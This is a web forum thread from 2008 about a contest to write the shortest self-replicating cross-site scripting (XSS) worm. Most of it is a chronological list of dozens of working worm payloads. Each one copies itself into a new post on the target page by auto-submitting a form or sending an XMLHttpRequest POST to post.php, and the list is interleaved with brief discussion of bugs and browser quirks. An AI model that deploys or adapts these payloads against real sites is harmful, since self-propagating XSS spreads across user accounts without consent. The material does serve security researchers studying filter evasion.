Diminutive XSS Worm Replication Contest

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 10, 2008 03:27AM

For testing:

- enable Firebug (or something similar)
- launch worm
- open tab NET -> XHR (or ALL)
- click on the post.php link
- look at the response tab, you will see no response without the proper header.

I wish it worked you see, but it doesn't.

Edited 1 time(s). Last edit at 01/10/2008 03:28AM by Ronald.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Spyware

Date: January 10, 2008 03:40AM

Oh, lol. I should get some more sleep, thanks for pointing that out .Mario =]

Edited 1 time(s). Last edit at 01/10/2008 12:59PM by Spyware.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 10, 2008 03:43AM

document.body.match is not a function

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 10, 2008 03:46AM

.mario, with which vector do you join the contest? can't find it back (&im lazy yes) i'd like to see some final submissions, maybe we can tweak them all together.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 10, 2008 03:49AM

This one

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Gareth Heyes

Date: January 10, 2008 05:11AM

@mario

Why is that vector valid? The '+' becomes a space? or am I missing something?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: digi7al64

Date: January 10, 2008 05:11AM

@.mario

ohh how i wish it was that easy to determine a winner...but that worm isn't it. '+' are url decoded to ' ' meaning you code is parsed to following which fails

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>' innerHTML.slice(action=(method='post') '.php',148)))"

edit: damn gareth you beat me to it.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Edited 1 time(s). Last edit at 01/10/2008 05:12AM by digi7al64.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 10, 2008 05:15AM

@Gareth,

no .mario's works fine, I just tested it. only with the XHR object the + must be properly treated.

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: Anonymous User

Date: January 10, 2008 05:16AM

I don't relly get the new urldecode trend - since when are POST values urldecoded in PHP?

Options: Reply•Quote

Re: Diminutive XSS Worm Replication Contest

Posted by: digi7al64

Date: January 10, 2008 05:17AM

I will post every single version submitted (chronologically) so expect to see this edited a fair bit

digi7al64

<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>

gareth

<script>function(){alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURIComponent(a)+' name=content></form>');this.onload=function(){document.f.submit()}}()</script>

matt preston

<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>

ritz

<i><img src="/" onerror=alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>

ritz

<i><img src="/" onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>

.mario

<form method=post action=post.php><img src=x onerror=i=this.parentNode;i.lastChild.value=i.parentNode.innerHTML;i.submit()><input name=content></form>

ritz

<i><img src=. onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()">
<form method=post action=post.php><input name=content></form></i>

barbarianbob

<b><img src onerror="alert('xss');n=(m=this.parentNode).lastChild;n.content.value='<b>'+m.innerHTML+'</b>';n.submit()"
<form method=post action=post.php><input name=content></form></b>

arantius

<p><form method=post action=post.php><input name=content><script>alert('XSS');F=document.forms;f=F[F.length-1];
f.content.value='<p>'+f.parentNode.innerHTML;f.submit();</script>

ritz - 191

<s><img src=. onerror="alert('xss');f=this.nextSibling;f.firstChild.value='<s>'+this.parentNode.innerHTML+'</s>';f.submit()">
<form method=post action=post.php><input name=content></form></s>

ma1 - 174

<b><img src=. onerror=alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form></b>

bwb labs - 188

<b><img onerror="alert('xss');n=(m=this.parentNode).lastChild;n[0].value='<b>'+m.innerHTML+'</b>';n.submit()" src=""><form action="post.php" method="post"><input name="content"></form></b>

ma1 - 173

<b><form method=post action=post.php><img src=. onerror=alert('xss');with(this.parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form></b>

.mario - 166

<b<img src=m onerror=alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form</b

ritz - 181

<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()">
<form method=post action=post.php><input name=content></form></b>

ritz - 187

<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

ma1 - 181

<b><img onerror="alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src=""><form><input name="content"></form></b>

ritz - 176

<b><img onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src="">
<form><input name="content"></form></b>

barbarianbob - 165

<b<form action=post.php method=post><img src=. onerror=alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form</b>

sdc (barbarianbob) - 178

<b><form action="post.php" method="post"><img src="." onerror="alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()"><input name="content"></form></b>

ritz - 162

<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,155);click()" type="image">

sdc - 159

<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,148)))</SCRIPT>

sdc - 145

<form id=z><input name="content"><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>

bwb labs - 193

<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>

bwb labs - 168

<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>

ronald

<script>f.content.value=document.body.innerHTML+alert("xss");f.submit();</script>

spikeman - 143

<form id=z><input name=content><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>

gareth

 <form><input name=content type=image onerror="f=this.form;i=f.innerHTML.replace(/(.*)/,'<form>$1</form>');this.type='hidden';alert('XSS');f.action='post.php';f.method='post';f.content.value=escape(i);submit()" src=></form>

gareth - 167

<form><input name=content type=image onerror="f=form;i=f.innerHTML;type='hidden';alert('XSS');f.action=(f.method='post')+'.php';value=escape('<form>'+i);submit()" src>

ronald

<form name=content><marquee onstart="content.value=document.body.innerHTML+alert('xss');content.submit();">

ronald

<form name="i"><input name="content"><marquee onstart="content.value=document.body.innerHTML+alert('xss');i.submit();">

gareth - 164

<form><input name=content type=image onerror="with(form)action=(method='post')+'.php',i=escape('<form>'+innerHTML);value=i;type='hidden';alert('XSS');submit()" src>

ronald - 139

<form method=post action=post.php name=i><input name=content><script>content.value=document.body.innerHTML+alert('xss');i.submit();</script>

gareth - 206

<script>(function(){alert('XSS');with(document)write('<form method=post action=post.php><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>'),forms[0].submit()})()</script>

gareth

<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>

spyware - 116

<form name=o action=post.php <img src=. onError=o.value=document.body.innerHTML+alert('xss');javascript:o.submit();>

ronald - 139

<form method=post action=post.php name=i><input name=content><script>content.value=document.body.i.innerHTML+alert('xss');i.submit();</script>

ronald - 138

<form method=post action=post.php name=i><input name=content><script>i.content.value=document.i.innerHTML+alert('xss');i.submit();</script>

ronald - 141

<form method=post action=post.php name=i><input name=content><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>

spyware - 149

<form method=POST name=content action=post.php <img src=. onError=content.value=document.content.innerHTML+alert('xss');javascript:content.submit();>

sdc (via spyware)

<form method="POST" name="content" action="post.php"><img src="." onError="content.value=document.content.innerHTML+alert('xss');javascript:content.submit();">

sdc (via ronald)

<input name="content"><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>

sdc

<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</SCRIPT>

barbarianbob - 171

<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>

ma1 (via sdc) - 158

<form id=_><input name="content"><script>with(_)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(0,148)))</script>

dev80 - 145

<script>function p() {x=new XMLHttpRequest;x.open("post","past.htm");x.send("content=<script>" + p.valueOf() + "p()<\/script>");}p()</script>

sdc (via dev80) - 142

<script>function p(){with(XMLHttpRequest)open("post","past.php"),send("content=<script>"+p.valueOf(alert('xss'))+"p()<\/script>")}p()</script>

ma1 - 163

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">

ma1 - 164 (works with opera and safari also)

<form><INPUT name="content"><IMG src="/" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,158)))">

sdc - 161

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">

dev80 - 159

<script>function p() {alert("xss");x=new XMLHttpRequest;x.open("post","post.php");x.send("content=<script>" + p.valueOf() + "p()<\/script>");}p()</script>

ma1 - 161

<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">

ma1 - 156

<form id=_><input name="content"><script>with(_)alert('XSS',submit(content.value='<form id=_>'+innerHTML.slice(action=(method='post')+'.php',147)))</script>

ma1

<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

sdc - 155

<form><input name="content"><script>with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),146))</script>

amado - 140

 <script>(function w(){alert("xss");n=new XMLHttpRequest;n.open("post","post.php");n.send("content=<script>("+w+"())<\/script>")}())</script>

shawn

<form id=_><input name=content id=c><script>with(_)submit(action=(method='post')+'.php',c.value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>

spyware - 122

<form method=POST action=post.php><INPUT NAME=content onFocus=content.value=document.body.innerHTML;alert('xss');submit()>

spyware - 137

<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

sdc - 141

<script>function w(){alert("xss");(n=new XMLHttpRequest).open("post","post.php");n.send("content=<script>("+w+"())</"+"script>")}w()</script>

sdc - 164

<script>function f(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>"+f+"f()</"+"script>"));}f()</script>

spyware - 137

<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

sdc (via spyware)

<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>

sdc

<b><form method="post" action="post.php"><input name="content" onfocus="submit(value=parentNode.parentNode.innerHTML.bold(),alert('xss'))"></form></b>

spyware - 151

<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>

shawn

<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>

sdc (via shawn) - 143

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',_[0].value='<form>'+innerHTML.slice(alert('XSS'),152))">

spyware - 134

<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>

ma1 - 136

<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">

ma1 - 129

<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),123))">

spyware - 134

 ý<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/ý.*/);alert('xss');submit()"></form>

bwb labs

<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>

shawn (via ma1) - 128

<form><input name="content" onblur="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),122))">

hallvors - 185

<iframe src="javascript:alert('XSS');onload=function(){f[0].value='<iframe src=\x22'+frameElement.src+'\x22>';f.submit()};'<form method=post action=post.php id=f><input name=content>'">

hallvors - 150

<iframe src="javascript:alert('XSS');with(new top.XMLHttpRequest){open('post','post.php');send('content=<iframe src=\x22'+frameElement.src+'\x22>')}">

spyware - 140

ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.match(/ý.*/);" type="submit"></form>

barbarianbob (via ma1) - 127

<form<input name="content" onblur="submit(action=(method='post')+'.php',value='<form'+form.innerHTML.slice(alert('xss'),122))">

bwb labs - 271

<img src='' alt="alert('XSS');var x=new XMLHttpRequest;x.open('post','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<img src=\'\' alt=\x22'+alt+'\x22 onerror=\'eval(alt)\'>'))" onerror='eval(alt)'>

.mario - 171

<b><img onerror="alert('xss');with(i)content.value=parentNode.innerHTML.bold(),submit()" src="m"><form id="i" action="post" method="post"><input name="content"></form></b>

.mario - 126

<form><input name="content" onblur="submit(action=method='post',value='<form>'+parentNode.innerHTML.slice(alert('xss'),128))">

.mario (via all) - 125

<form><input name="content" onblur="submit(action=method='post',value='<form>'+form.innerHTML.slice(alert('xss'),119))">

.mario - 125

<form id=i><button onclick="i.method=i.action='post',value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button>

.mario - 136

<form><button onclick="with(parentNode)action=(method='post')+'.php',value='<form>'+innerHTML.slice(alert('XSS'),129)" name="content">

.mario - 140

<form id=j><button onclick="j.action=j.method='post';value='<form id=j>'+j.innerHTML+'</form>';alert('XSS')" name="content"></button></form>

spikeman (via .mario) - 132

<form id=i><button onclick="i.action=(i.method='post')+'.php';value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button>

ronald - 147

<form id=_><input name=content><script>_.content.value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit();</script>

ronald - 145

<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit();</script>

ronald - 141

<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>

mario (via ronald) - 142

<form id=m><input name="content"><script>with(m)m[0].value='<form id=m>'+innerHTML,submit(action=(method='post')+'.php'),alert('XSS')</script>

spyware - 135

ý<form action="post.php" method="post"><input name="content" onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();"></form>

spyware - 129

ý<FORM action=post.php method=post><INPUT onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();" name=content></FORM>

ronald - 132

<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.slice(/./);submit();"></form>

.mario - 141

<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=(method='post')+'.php',i.value='<form>'+innerHTML)</script>

.mario - 132

<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=method='post',i.value='<form>'+innerHTML)</script>

sdc

<form><INPUT name="content"><IMG src="" onerror="with(z=parentNode)submit(action=(method='post')+'.php',z[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">

gareth - 164

<form><input type=image name=content onerror="alert('XSS');with(p=parentNode)action=(method='post')+'8.php',value='<form>'+p.innerHTML;type='text';p.submit()" src>

sdc (via gareth)

<form><input type="image" name="content" onerror="alert('XSS');with(p=parentNode)action=(method='post')+'.php',value='<form>'+p.innerHTML;type='text';p.submit()" src="">

sdc (via ronald)

<form id=_><input name="content"><script>_[0].value='<form id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>undefined

ronald - 143

<form id=_><input name='content'><script>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>

ma1 - 142

<form id=_><input name="content"><script>with(_)_[0].value='<form id=_>'+innerHTML,action=(method='post')+'.php',submit(alert('XSS'))</script>

spyware - 141

ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.slice(/ý.ú/);" type="submit">ú</form>

doctordan - 158

<form name=r><input name="content"><script>with(document.r)submit(content.value='<form name=r>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>

ma1 - 157

<form name=f><input name="content"><script>with(_=document.f)submit(_[0].value='<form name=f>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>

dbloom - 252

 <body onfocus=with(document)[c=["%3"]+"E",body.innerHTML=unescape("<form\tmethod=post\taction=/post.php"+c+"<textarea\tname=content"+c+"<body\tonfocus="+(onfocus+c).replace(/[\s\x7B\x7D\x3B]|^[^\)]*\)/g,"")+"</body"+c),forms[0].submit(),alert("xss")]>

gareth - 160

 <form><textarea name=content onMouseMove="eval(value)">alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()</textarea>

gareth - 154

 <form><input name=content onMouseMove="eval(value)" value="alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()">

ma1 (via gareth)

<form><input name="content" onmousemove="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),128))">

sdc - 156

<form><input name=content><img onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',150)))"src=

sdc

<form><input name=content><img onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',151)))"src=

kyran -

 <script>alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};</script>

.mario - 159

<form><img onerror="with(i=parentNode)alert('XSS',submit(i[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',153)))" src="x"><input name="content"

.mario - 158 (similar to doctordan's)

<form name=m><input name="content"><script>with(document.m)submit(alert('XSS'),action=(method='post')+'.php',content.value='<form name=f>'+innerHTML)</script>

bwb labs (via dbloom) - 256

<script>eval(y="alert('XSS');q=unescape('%'+22);with(new XMLHttpRequest()){open('POST','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>

spikeman - 154

<form><input id="c" name="content"><img onerror="with(c)with(parentNode)alert('xss',submit(value='<form>'+innerHTML,action=(method='post')+'.php'))" src="

bwb labs - 255

<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest()){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>

bwb labs - 256

<img src=. alt="alert('XSS');with(new XMLHttpRequest){open('post','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))}" onerror=eval(alt)>

bwb labs - 253

<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>

ronald (via kyran)

<script>alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};
</script>

ronald (doctype check)

<form id=_><input name='content'><script>(_)?x=_:x=document.i;x[0].value='<form id=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>

.mario (via ronald) - 161

<form name=_><input name="content"><script>x=document._;x[0].value='<form name=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>

ronald

<form name="i" id=j>
<input name='content'><script>(j)?x=j:x=document.i;x[0].value='<form name="i" id=j>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>

gareth

<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>

gareth

<body onload="with(document)body.innerHTML='<form action=post.php method=post><textarea name=content>'+body.parentNode.innerHTML,forms[0].submit()"

gareth

<script>with(document.body)innerHTML='<form action=post.php method=post><textarea name=content>'+parentNode.innerHTML;document.forms[0].submit()</script>

gareth

<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>

beni - 171

 <b><form action=post.php method=post><input name=content><img src=1 onerror=alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}></form></b>

mario (via beni) - 177

<b><form action="post.php" method="post"><input name="content"><img src="1" onerror="alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}"></form></b>

gareth (final entry for about the 8th time :P)

<body onload="alert('XSS');with(d=document)body.innerHTML='<form><textarea name=content>'+body.parentNode.innerHTML.match(/.{21}XSS.{176}/);with(d.forms[0])submit(action=method='post'+'.php')"

ronald

<iframe src=. onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.setRequestHeader('content-type','multipart/form-data');r.send('content='+body.innerHTML)">

ronald (works in firefox)

<iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+body.innerHTML)">

beni (via ronald)

<b><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+parentNode.innerHTML.bold())"></b>

ronald

<form><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content=<form>'+document.forms[0].innerHTML)">

gareth

<script x="">alert('XSS');with(document)c=body.parentNode.innerHTML.match(/<script x([\n]|.){197}/)[0],body.innerHTML='<form action=post.php method=post><textarea name=content>'+c,forms[0].submit()</script>

spyware - 146

<form id=a><input id=x name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))">

spyware - 157

<form id=a><input id="x" name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></iframe>

spyware - 173

<form id=a></HEAD><BODY><INPUT id=x name=content><IFRAME onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></IFRAME></BODY>

ronald - 129

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

gareth

<x><script>alert('XSS');with(new XMLHttpRequest)open(x='post',x+'.php'),send('content='+document.body.parentNode.innerHTML.match(/<x>.*<\/x>/))</script></x>

matt presson

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold)"></b>

bwb labs - 254

<img src=. alt="alert('XSS');with(new XMLHttpRequest)open('post','post.php'),setRequestHeader('Content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))" onerror=eval(alt)>

bwb labs - 251

<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>

ronald (via gareth) - 138

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></iframe></b>

ronald

<b><img src='' onerror="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

ronald - 130

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

.mario - 134

<b><img/onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"/src=""></b>

.mario - 129

<b><iframe/onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

ma1 - 155

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',149)))">

.mario (via ma1) - 154

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"

sdc - 154 (via ma1/.mario)

<form><input name="content"><iframe onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"

backstorm - 125

<b><i onload="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"/></b>

matt presson (via backstorm) - 125

<b><a onblur="alert('xss')with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

ronald - 131

<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold(alert('XSS')))"></b>

matt presson (via backstorm/ronald) -125

<b><a onblur="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('xss')))"></b>

doctordan (via ronald) - 134

<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

doctordan (via ronald) - 130

<b><img onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"src=></b

gareth - 142

 _<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+document.body.innerHTML.match(/_<*.+/))">

doctordan (via gareth) - 138

 _<img src="" onerror="alert('XSS');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/_<.+/))">

doctordan - 139

 {<img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+?\d/)),alert('XSS')">9

gareth - 160

<form><input onerror="i=this;with(form)submit(alert('XSS',i.value='<form>'+innerHTML,i.type=action=(method='post')+'.php'))" name="content" src="" type="image">

ronald - 134

<b><img src='' onerror="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>

gareth

_<script>c=(d=document).body.innerHTML.match(/_<.*/)+'\n';with(d.body.appendChild(d.createElement('form')))submit(alert('XSS',innerHTML='<textarea name=content>'+c,action=(method='post')+'.php'))</script>

ronald

<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">

gareth

<form><img src="" onerror="(f=parentNode)[0].value='<form>'+f.innerHTML;with(f)submit(alert('XSS',action=(method='post')+'.php'))"><input name="content">

gareth - 146

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))"

badsamaritan

 <form method=post action=post.php><input name=content><input type=image onerror="(f=this.form).content.value=f.parentNode.innerHTML;alert('xss');f.submit()"src=></form>

digi7al64 - 134 (IE only)

<form id=_ method=post action=post.php><input name='content'><iframe onload=with(_)alert('XSS',submit(_[0].value=_.outerHTML))></form>

digi7al64 - 111 (IE only)

<script id=_>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+_.outerHTML)</script>

digi7al64 - 133

<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p id=_>'+_.innerHTML+'</p>')</script></p>

doctordan - 133

{<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+\v/)),alert('XSS')">0x0B

glacialphoenix (via digi7al64) - 226

